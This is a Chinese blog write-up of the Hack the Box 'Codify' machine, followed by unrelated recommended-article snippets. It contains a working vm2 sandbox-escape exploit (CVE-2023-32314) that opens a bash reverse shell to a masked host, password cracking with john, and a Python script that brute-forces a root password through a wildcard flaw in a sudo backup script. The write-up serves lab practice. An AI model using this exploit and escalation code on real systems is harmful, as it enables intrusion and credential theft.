hack the box --codify

最新推荐文章于 2025-05-09 18:24:41 发布
最新推荐文章于 2025-05-09 18:24:41 发布
阅读量211 收藏
点赞数 4
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73968711/article/details/134934355
版权 
sudo nmap --open --min-rate 1000 -p- 10.10.11.239

sudo nmap -sS -sV -A -n -p22,80,3000,7070,7778,8000,8911 10.10.11.239

把域名写入hosts文件,才能访问web端口

web内容

看到这里可以运行命令,就可以反弹shell回来,具体漏洞 CVE-2023-32314,可去GitHub上搜索利用脚本

这里用脚本反弹一个shell回来

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync(" bash -c 'bash -i >& /dev/tcp/xxxxxxx/xxxxx 0>&1'").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code));

得到shell,翻了一大圈就tickerts.db里面有内容,尴尬的是在网站8911这个端口上可以直接访问这个文件,并且下载

查看文件得到joshuo用户加密的哈希

把hash放入文件用john破解得到明文密码

john 1.txt --wordlist=/usr/share/wordlists/rockyou.txt

然后登陆ssh,好家伙,exp都给写好了,这里得到普通用户的flag

直接运行py,得到root的密码

得到flag

总结:我这个机器应该出了点问题,前面就设计的不合理。后面翻看资料查看最后提权的内容,原来是有一个root密码比对的sh脚本,但是他写的有一点问题,if [[ $DB_PASS == $USER_PASS ]],导致了可以一直用通配符“*”爆破比对密码

爆破脚本

import string
import subprocess

all = list(string.ascii_letters + string.digits)
password = ""
flag = False

while not flag:
    for ch in all:
        command = f" echo {password}{ch}* |  sudo /opt/scripts/mysql-backup.sh";
        output = subprocess.run(command,shell=True,stderr=subprocess.PIPE,stdout=subprocess.PIPE,text=True).stdout;
        if ("fail" in output ):
            pass
        else:
            password+=ch
            print(password)
            break
    else:
        flag = True
        print(password)

有漏洞的shell程序

#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
解锁编程新姿势:Bolt DIY + Deepseek打造免费代码编写助手
AI新纪元,探索新时代
01-04 2986
Bolt DIY 与 Deepseek 的结合为我们打开了一扇通往全新编程世界的大门。它打破了传统编程的诸多束缚,将开源的力量与智能代码生成技术完美融合,让编程变得更加智能、高效、有趣。无论你是刚刚踏入编程世界的新手,渴望借助 AI 的力量快速入门,还是在编程领域深耕多年的资深开发者,寻求突破创新的契机,都不妨尝试一下这个强大的组合。现在,就让我们怀揣着对编程的热爱和对未来的憧憬,踏上这一编程新征程吧!不知道大家有没有使用过类似的编程辅助工具呢?
本地部署 Bolt.new - 小学生都能轻松搭建AI编程环境
engchina的专栏
12-03 7032
本地部署 Bolt.new - 小学生都能轻松搭建AI编程环境
【攻略】Bolt.diy 云端部署与应用实战:快速生成你的创意助手
热门推荐
weixin_44913594的博客
04-16 21万+
Bolt.diy 作为 AI 创意建站的轻量平台,真正做到了“低代码 + 自然语言 + 快速云端部署”的理念。无论是 AI 开发新手,还是想验证产品创意的开发者,都能在这套解决方案中获得极高的效率提升与自由度。如果你对 AI 产品开发有兴趣,不妨趁现在通过阿里云免费额度,亲自部署体验一番!
0 代码焦虑!阿里云 Bolt.diy 一键解锁你的专属网站,30 分钟惊艳上线
2301_80863610的博客
04-26 16万+
Bolt.diyBolt.new 的开源版本,它巧妙地融合了阿里云函数计算 FC 和百炼模型服务,将智能化开发与快速云端部署完美结合。其最大的亮点在于,让建站不再是程序员的专属技能,普通用户仅需通过自然语言描述自己的需求,就能轻松生成完整的网站应用。Bolt.diy 依托阿里云 FC 计算平台,用户无需在本地进行繁琐的环境配置,即可直接在云端部署运行,方便又快捷。一个网站创建下来也就只花个3分钟,快速方便,这要放在前几年,那这个工具已经算的上神器了,都抢着用。
Bolt.diy:更灵活更开放的AI全栈开发工具
AliCloudROS的博客
03-26 999
它允许用户在浏览器中直接运行完整的 Node.js 环境,并通过自然语言提示快速生成、运行、编辑和部署全栈 Web 应用程序,从而大幅简化开发流程,成为AI辅助编程的标杆。但Bolt.new有一定的封闭性,只能使用官方默认的大语言模型,而且生成的web应用一键部署也是只能部署到Netlify。Bolt.diy是一个开源项目,它原本是Bolt.new项目的一个开源分叉,现在已经发展成为Bolt.new的官方开源版本,它不仅延续了核心功能,功能更强大也更具有灵活性。
一文看懂Bolt.diyBolt.new的开源孪生兄弟,更强大更灵活
AI智能体研究
12-27 5846
所以今天再给大家介绍一下Bolt.diy这个开源项目,它原本是Bolt.new项目的一个开源分叉,现在已经发展成为Bolt.new的官方开源版本,给喜欢研究的用户提供了更多的灵活性和开放性。通过本文的介绍,希望读者能够对 Bolt.diy 有更全面的了解,并在实际开发中充分利用这一强大的工具。故事是这样的,Bolt.diy 之前曾被称为 oTToDev 和 Bolt.new ANY LLM,是由开源社区的 Cole Medin 创建的,但迅速发展为一个庞大的社区项目,致力于成为。
Bolt.diy 测评:从零部署到创意实践的全流程体验
dyqd2011的博客
04-23 1261
在工作场景中,我会让Bolt.diy协助我提升工作效率,比如通过输入如“开发一个用户行为分析仪表盘,包含实时数据图表和权限管理模块”等自然语言指令,直接生成React前端+Node.js后端的代码框架。在需求评审阶段快速输出可视化Demo,减少与产品经理的沟通成本;而针对重复性任务(如日志分析、API测试),利用Bolt.diy编写类似“生成Python脚本,每日定时抓取服务器日志并发送异常摘要到Slack”的指令,利用其与百炼模型的集成自动生成脚本逻辑,并通过函数计算FC实现云端部署,缩短部署耗时。
【全栈开发平台】全面解析 StackBlitz 最新力作 Bolt.new:AI 驱动的全栈开发平台
万物皆有灵
11-12 2555
StackBlitz 的 Bolt.new无疑是全栈开发领域的一次重大创新。通过结合 AI 智能与 WebContainers 技术,Bolt.new 为开发者提供了一个高效、便捷、安全的开发平台,彻底颠覆了传统开发环境的配置与使用方式。无论你是资深开发者,还是编程新手,Bolt.new 都能为你带来前所未有的开发体验。未来,随着 Bolt.new 功能的不断完善与生态的日益丰富,它必将成为开发者们不可或缺的得力助手,助力他们在技术创新的道路上乘风破浪。
开源项目安装与配置指南:bolt.diy
gitblog_00450的博客
03-27 489
开源项目安装与配置指南:bolt.diy bolt.diy Prompt, run, edit, and deploy full-stack web applications using any LLM you want! 项目地...
Bolt.new:终极自动化编程工具
XiaoLiuLB的博客
10-06 9323
WebContainers 是一种运行在浏览器中的全栈 Node.js 环境,使用 WebAssembly 技术,不依赖远程服务器。它允许开发者在浏览器中创建和运行 Node.js 应用,并且能够在毫秒内启动这些环境,还可以通过链接分享应用。bolt․new 可以创建漂亮的、准备投入生产的多页应用,带有后端和数据库(如 Supabase),并且可以一键部署到生产环境。秘密就在于 WebContainers,它是我们的微型操作系统,可以在你的浏览器标签中运行完整的 web 开发环境。
Bolt.Cache:缓存库
06-19
**Bolt.Cache:缓存库** Bolt.Cache是一个专门为提高应用程序性能而设计的多缓存库。在软件开发中,缓存是一种重要的技术,它通过存储经常访问的数据来减少对数据库或其他资源的访问,从而显著提升系统的响应...
bolt.nvim::high_voltage:具有模糊匹配的Neovim超快速多窗格文件管理器
02-02
:high_voltage: bolt.nvim :high_voltage: Neovim的按需过滤文件管理器,着重于速度和可见性 “ Total Commander启发了21世纪的文件管理器” 演示版 导航 键入时,过滤器会自动更新,无需额外的击键。 正在搜寻 ...
bolt.js:闪电般的快速营销奇才
06-08
Bolt.js:打造闪电般的快速营销利器》 在当今的互联网时代,营销策略与技术紧密结合,成为企业脱颖而出的关键。...如果你希望在数字营销领域抢占先机,不妨尝试一下Bolt.js,感受它的闪电速度和无穷潜力。
指定Docker镜像源,使用阿里云加速异常解决
Phor的博客
05-07 499
因为系统默认没有安装这个命令,这个命令在yum-utils 包里,可以通过命令yum -y install yum-utils 安装。
开发搭载阿里云平台的物联网APP(支持数据接收与发送)
电路巫师把一切不可能变成不可能
05-07 1420
速构建支持阿里云物联网平台双向通信的跨平台APP(兼容Android/iOS/小程序),实现设备监控与远程控制的核心功能。关键点在于正确配置MQTT连接参数和遵循阿里云Alink数据格式规范。备注:本人可有偿提供;
阿里云MongoDB 的感谢信 !!成本降低80%
sql server的专栏
05-09 1147
最近我们遇到一个难题,关于降本的问题,熟悉MongoDB的都清楚,一个MongoDB的复制集至少是需要3台主机的,而在云上MongoDB的成本一直都比较高,基于我们的需求,我们希望MongoDB的成本能降低。很多时候,态度决定了很多事情。
阿里云 SLS 多云日志接入最佳实践:链路、成本与高可用性优化
最新发布
阿里巴巴云原生的博客
05-09 1551
本文旨在为企业构建稳定、低成本、高可用的全球日志系统提供全面的实践指导和配置参考。
商业 |阿里云又丢出了核弹
持之以恒
05-09 1136
Qwen3大模型发布。
阿里云2核2g安装nexus
qq_41820986的博客
05-07 704
阿里云2核2g安装nexus。
bolt.nvim:打造Neovim超快速的模糊匹配多窗格文件管理器
- **filter-as-you-type**: 动态过滤是bolt.nvim的核心功能之一,即在用户输入时即时过滤显示的结果。 - **dual-pane**: 再次强调双窗格功能。 - **fuzzy-matching**: 模糊匹配是bolt.nvim的另一个核心特性。 - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值